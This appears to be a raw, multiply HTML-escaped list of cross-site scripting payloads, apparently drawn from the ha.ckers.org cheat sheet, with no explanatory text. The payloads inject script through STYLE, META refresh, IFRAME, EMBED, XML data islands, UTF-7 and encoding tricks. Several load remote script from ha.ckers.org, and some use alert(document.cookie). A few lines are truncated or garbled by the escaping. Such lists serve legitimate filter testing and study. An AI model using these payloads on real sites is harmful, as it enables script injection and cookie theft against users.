&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
